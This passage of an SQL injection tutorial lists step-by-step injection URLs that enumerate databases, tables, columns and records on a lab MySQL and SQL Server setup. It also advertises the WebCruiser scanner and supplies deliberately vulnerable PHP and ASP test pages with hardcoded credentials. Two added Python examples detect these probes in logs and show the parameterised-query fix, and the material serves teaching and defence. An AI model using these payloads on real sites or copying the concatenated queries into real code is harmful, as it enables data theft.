Because (select length(user())) is valid in MySQL, we can guess it is using MySQL.

2.1.4 Method of Getting Data
There are many methods of getting data by SQL Injection, but not all of them are supported in every actual penetration test. These methods include:
* Plain text error (produce an error and get information from the error message);
* Union replace (use "null union select column from table" to replace the response);
* Blind SQL Injection (use ASCII comparison when there is no error message in the response);
* Cross-site SQL Injection (send the information to a third site);
• 8.
* Time delay (produce a time-consuming SQL statement and get information from the response time).
In example 1, the response of
http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
includes the database name "test", so you can get data by plain text error.
In example 2, the response of
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select char(65,65,65),1%23
includes "AAA" (char(65,65,65)), so you can get data by union replace.

2.2 Get Data by SQL Injection
2.2.1 Get Database Name
Example 1:
Get current database:
http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
• 9.
Get all databases:
Get the number of databases: 10
http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [master]..[sysdatabases]) as varchar(8))))>0
Get each database name (master, tempdb, etc.) by changing the value of dbid:
http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=1))>0
http://192.168.254.21:79/sql.asp?uid=1 and (char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases] where dbid=2))>0

Example 2:
• 10.
Get current database:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select database(),1 %23
Get all databases:
Get the number of databases: 18
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(SCHEMA_NAME) from information_schema.SCHEMATA) as char)),1 %23
Get each database:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 0,1%23
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select SCHEMA_NAME,1 from information_schema.SCHEMATA limit 17,1%23
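As an added example that is not part of the tutorial, the following Python script shows the defender's view of sections 2.1.1 through 2.2.1: every probe above leaves a recognisable shape in the web server access log (paired true/false conditions, a quote followed by and/or, union ... select, information_schema or sysdatabases lookups, char() encoding, a trailing comment marker). The log lines below are constructed for this example and replay the tutorial's own requests against mysql.php and sql.asp; the rule names are my own. The query string is URL-decoded before matching, because the tutorial's requests arrive with %27, %2B and %23 encoded and a pattern applied to the raw line would miss them.

```python
"""Flag the SQL injection probes described in the tutorial in access log lines.

Added example, not the tutorial's own code. Patterns are applied to the
URL-decoded, lower-cased query string of each request.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log (combined log format). Lines 1-3 replay the
# tutorial's probes; lines 4-5 are the benign baseline requests.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2010:13:55:36 +0000] "GET /mysql.php?username=bob%27+and+%271%27%3D%271 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2010:13:55:40 +0000] "GET /mysql.php?username=bob%27+and+1%3D2+union+all+select+database(),1+%23 HTTP/1.1" 200 498
10.0.0.5 - - [10/Oct/2010:13:56:02 +0000] "GET /sql.asp?uid=1+and+(char(65)%2Bchar(65)%2B(select+name+from+[master]..[sysdatabases]+where+dbid=1))>0 HTTP/1.1" 500 1203
10.0.0.9 - - [10/Oct/2010:13:57:10 +0000] "GET /mysql.php?username=bob HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2010:13:57:15 +0000] "GET /sql.asp?uid=1 HTTP/1.1" 200 640
"""

# ip ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)

# (rule name, pattern) in the order results are reported. Names are my own.
RULES = [
    ("boolean_condition", re.compile(r"\band\s+'?\d'?\s*=\s*'?\d'?")),   # and 1=1, and '1'='2
    ("quote_break", re.compile(r"'\s+(and|or)\b")),                      # bob' and ...
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("comment_terminator", re.compile(r"(#|--)\s*$")),                   # trailing %23 / --
    ("schema_enumeration", re.compile(
        r"information_schema|sysdatabases|sysobjects|db_name\s*\(|database\s*\(")),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+")),                  # char(65,65,65)
]


def decoded_query(url):
    """Return the URL-decoded query string of a request target ('' if none)."""
    _, sep, query = url.partition("?")
    return unquote_plus(query) if sep else ""


def classify(query):
    """Names of every rule that fires on one decoded query string."""
    q = query.lower()
    return [name for name, pat in RULES if pat.search(q)]


def scan_log(text):
    """Return one finding per flagged request: ip, timestamp, url, status, rules."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unexpected format: skip rather than guess at fields
        rules = classify(decoded_query(m["url"]))
        if rules:
            findings.append({"ip": m["ip"], "ts": m["ts"], "url": m["url"],
                             "status": int(m["status"]), "rules": rules})
    return findings


def summarize(findings):
    """Flagged requests per source address, the usual basis for an alert threshold."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']} {f['status']} {','.join(f['rules'])}  {f['url'][:72]}")
    print(summarize(hits))
```

On the constructed log the three probes from 10.0.0.5 are flagged and the two plain requests from 10.0.0.9 are not. One decode pass is enough for the tutorial's requests; logs from an application that decodes twice would need the same treatment before matching.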
• 11.
2.2.2 Get Table Name
Example 1:
Get the number of tables: 6
http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test]..[sysobjects] where xtype=0x55) as varchar(8)))>0
Get each table:
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 1 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0
…
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 4 id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0

Example 2:
Get the number of tables: 5
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(TABLE_NAME) from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116)) as char)),1 %23
• 12.
Get each table:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select TABLE_NAME,1 from information_schema.tables where TABLE_SCHEMA=char(116,101,115,116) limit 2,1%23

2.2.3 Get Column Name
Example 1:
Get the number of columns in table 't1': 3
http://192.168.254.21:79/sql.asp?uid=1 and char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test].information_schema.columns where table_name=0x74003100) as varchar(8)))>0
• 13.
Get each column:
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=1)>0
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from [Test].information_schema.columns where table_name=0x74003100 and ordinal_position=2)>0

Example 2:
Get the number of columns: 2
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat(char(65,65,65),cast((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49)) as char)),1 %23
• 14.
Get each column:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select COLUMN_NAME,1 from information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49) limit 0,1%23

2.2.4 Get Data Record
Example 1:
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 1 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0
• 15.
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32)) from (select top 2 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by [username] desc)>0

Example 2:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select concat_ws(char(94),ifnull(cast(`user` as char),char(32)),ifnull(cast(`des` as char),char(32))),1 from test.t1 limit 4,1%23

2.3 SQL Injection Tool
This SQL Injection Tutorial describes how to perform SQL Injection manually, but doing it step by step is inefficient. An automatic SQL Injection scanner and SQL Injection tool are preferred. WebCruiser Web Vulnerability Scanner is such an effective penetration testing tool.
• 16.
WebCruiser - Web Vulnerability Scanner is an effective and powerful web penetration testing tool that will aid you in auditing your website. It has a vulnerability scanner and a series of security tools, including a SQL Injection Tool, a Cross Site Scripting Tool, an XPath Injection Tool, etc. WebCruiser supports scanning a website as well as POC (proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection, etc. So WebCruiser is also an automatic SQL injection tool, an XPath injection tool and a Cross Site Scripting tool.

Key Features:
* Crawler (site directories and files);
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection, etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/POST/Cookie injection POC (proof of concept);
* SQL Injection for SQL Server: PlainText/Union/Blind injection;
* SQL Injection for MySQL: PlainText/Union/Blind injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite injection;
* SQL Injection for DB2: Union/Blind injection;
• 17.
* SQL Injection for Access: Union/Blind injection;
* Post Data Resend;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.
System Requirement: Windows 7/Vista, or Windows XP with .NET Framework 2.0.
Download WebCruiser from http://sec4app.com or http://www.janusec.com .

3 Build Typical Test Environment
3.1 PHP+MySQL Test Environment
XAMPP (http://sourceforge.net/projects/xampp/) will help you build a PHP+MySQL environment simply. Create database `test` and table `t1` and add records; here is the description:
• 18.
Create a file named mysql.php:

<?php
// Deliberately vulnerable test page: the username parameter is concatenated
// straight into the SQL statement, which is what this tutorial exercises.
$username = isset($_GET['username']) ? $_GET['username'] : '';
if ($username) {
    $conn = mysql_connect("127.0.0.1", "root", "123456") or die('Error: ' . mysql_error());
    mysql_select_db("test");
    $SQL = "select * from t1 where user='" . $username . "'";
    //echo "SQL=".$SQL."<br>";
    $result = mysql_query($SQL) or die('Error: ' . mysql_error());
    $row = mysql_fetch_array($result);
    if ($row['user']) {
        // These two fields are the "keywords" that distinguish a true from a false condition.
        echo "Username:" . $row['user'] . "<br>";
        echo "Description:" . $row['des'] . "<br>";
        echo "TestOK!<br>";
    } else {
        echo "No Record!";
    }
    mysql_free_result($result);
    mysql_close();
}
?>

Place mysql.php in the htdocs folder and navigate to
• 19.
http://192.168.254.21/mysql.php?username=bob

3.2 ASP/ASPX+SQL Server Test Environment
Create database test and table t1:

Create sql.asp:

<script language="javascript" runat="server">
// Deliberately vulnerable test page: uid is concatenated straight into the SQL statement.
var dbConn = Server.CreateObject("ADODB.Connection");
dbConn.open("Provider=sqloledb;Data Source=localhost;Initial Catalog=test;User Id=sa;Password=123456;");
var rs = Server.CreateObject("ADODB.RecordSet");
var uid = Request.QueryString("uid");
rs.open("select * from t1 where uid=" + uid, dbConn, 3);   // 3 = adOpenStatic, so RecordCount is available
Response.write("<html><head><meta http-equiv='Content-Type' content='text/html; charset=gb2312' /><title>Test</title></head>");
if (rs.RecordCount < 1) {
    Response.write("<p>No Record!</p>");
} else {
• 20.
    Response.write("<table border=1 width=800 cellspacing=0 bordercolordark=009099>");
    Response.write("<tr><td><b>uid</b></td><td><b>username</b></td><td><b>Description</b></td></tr>");
    for (var i = 1; i <= rs.RecordCount; i++) {
        if (!rs.Eof) {
            Response.write("<tr>");
            Response.write("<td><span style='font-size:9pt'>" + rs("uid") + "</span></td>");
            Response.write("<td><span style='font-size:9pt'>" + rs("username") + "</span></td>");
            Response.write("<td><span style='font-size:9pt'>" + rs("des") + "</span></td>");
            Response.write("</tr>");
            rs.MoveNext();
        }
    }
    Response.write("</table>");
}
Response.write("</html>");
rs.close();
dbConn.close();
</script>

Navigate to http://192.168.254.21:79/sql.asp?uid=1
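As an added example that is not the tutorial's code, here is the contrast between the string concatenation used by mysql.php and sql.asp above and the parameterised form that closes the hole. It uses Python's built-in sqlite3 so that it runs offline; the table t1 is recreated with the columns the tutorial uses, the rows are constructed, and the inputs are the tutorial's own true/false conditions from sections 2.1.1 and 3.x. The parameterised lookup treats the whole input as one literal value, so the true and false conditions no longer produce different responses, which is exactly the signal the "injectable or not?" test relies on.

```python
"""Concatenated versus parameterised lookups on the tutorial's table t1.

Added example, not the tutorial's own code. sqlite3 stands in for MySQL and
SQL Server; the vulnerable functions mirror mysql.php (string parameter) and
sql.asp (integer parameter), the safe ones show the fix.
"""
import sqlite3


def make_db():
    """In-memory copy of the test database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table t1 (uid integer primary key, user text, des text)")
    conn.executemany("insert into t1 values (?, ?, ?)", [
        (1, "bob", "first record"),
        (2, "alice", "second record"),
    ])
    return conn


def lookup_vulnerable(conn, username):
    """mysql.php style: the parameter is spliced into the statement text."""
    sql = "select user, des from t1 where user='" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Placeholder binding: the value is sent separately and never parsed as SQL."""
    return conn.execute("select user, des from t1 where user=?", (username,)).fetchall()


def by_uid_vulnerable(conn, uid):
    """sql.asp style: an integer parameter concatenated as text, no quotes needed."""
    return conn.execute("select uid, user, des from t1 where uid=" + uid).fetchall()


def by_uid_safe(conn, uid):
    """Enforce the type, then bind. int() rejects anything that is not a number."""
    try:
        n = int(uid)
    except ValueError:
        return []
    return conn.execute("select uid, user, des from t1 where uid=?", (n,)).fetchall()


def compare(conn):
    """Side-by-side results for the tutorial's probes (for printing or testing)."""
    probes = ["bob", "bob' and '1'='1", "bob' and '1'='2"]
    int_probes = ["1", "1 and 1=1", "1 and 1=2"]
    return {
        "string": {p: (lookup_vulnerable(conn, p), lookup_safe(conn, p)) for p in probes},
        "integer": {p: (by_uid_vulnerable(conn, p), by_uid_safe(conn, p)) for p in int_probes},
    }


if __name__ == "__main__":
    for kind, rows in compare(make_db()).items():
        for probe, (vuln, safe) in rows.items():
            print(f"{kind:8} {probe!r:22} vulnerable={vuln} safe={safe}")
```

The vulnerable functions reproduce what the tutorial observes: `bob' and '1'='1` returns the same row as `bob`, while `bob' and '1'='2` returns nothing, and the same pair of outcomes appears for `1 and 1=1` / `1 and 1=2` on the integer page. The parameterised functions return the row only for the exact values `bob` and `1`; for every injected input the result is empty in both the true and the false case, so there is no response difference to test against.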
• 21.
4 References
1. SQL Injection, http://sec4app.com/download/SqlInjection.pdf
2. WebCruiser Web Vulnerability Scanner User Guide, http://sec4app.com/download/WebCruiserUserGuide.pdf
3. Janus Security Software, http://www.janusec.com/
4. WebCruiser, http://sec4app.com/